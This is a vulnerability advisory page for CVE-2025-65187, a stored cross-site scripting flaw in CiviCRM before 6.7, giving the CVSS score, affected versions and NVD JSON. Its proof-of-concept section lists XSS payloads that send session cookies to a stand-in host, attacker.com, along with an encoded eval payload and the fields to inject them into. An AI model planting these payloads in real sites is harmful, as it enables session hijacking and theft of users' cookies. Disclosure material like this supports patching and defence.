Security Vulnerability Report
CVE-2025-65187 CVSS 6.1 MEDIUM

CVE-2025-65187

Published: 2025-12-02 16:15:56
Last Modified: 2025-12-23 13:59:26

Description

A Stored Cross Site Scripting vulnerability exists in CiviCRM before v6.7 in the Accounting Batches field. An authenticated user can inject malicious JavaScript into this field and it executes whenever the page is viewed.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:civicrm:civicrm:*:*:*:*:*:*:*:* - VULNERABLE
CiviCRM < 6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-65187 Stored XSS PoC for CiviCRM Accounting Batches -->
<!-- Authenticated user injects malicious JavaScript into Accounting Batches field -->

<!-- Method 1: Script tag injection -->
<script>alert('XSS - CiviCRM CVE-2025-65187');document.location='https://attacker.com/steal?cookie='+document.cookie;</script>

<!-- Method 2: Image onerror event handler -->
<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">

<!-- Method 3: SVG element injection -->
<svg/onload=fetch('https://attacker.com/steal?c='+btoa(document.cookie))>

<!-- Method 4: Body onload event -->
<body onload="eval(atob('YWxlcnQoJ1hTUyBDVlItMjAyNS02NTE4Nyc='))">

<!-- Injection points: -->
<!-- 1. Batch Name field -->
<!-- 2. Batch Description field -->
<!-- 3. Accounting Batch reference fields -->
<!-- When victim views the page containing the batch, script executes automatically -->
```

References

https://civicrm.com/ (Product)
https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65187.pdf (Exploit, Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-65187",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-02T16:15:56.157",
    "lastModified": "2025-12-23T13:59:26.110",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Stored Cross Site Scripting vulnerability exists in CiviCRM before v6.7 in the Accounting Batches field. An authenticated user can inject malicious JavaScript into this field and it executes whenever the page is viewed."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:civicrm:civicrm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "6.7.0",
                "matchCriteriaId": "A784BC9B-ABBB-4AFC-A8D3-A6A82122C0FC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://civicrm.com/",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65187.pdf",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```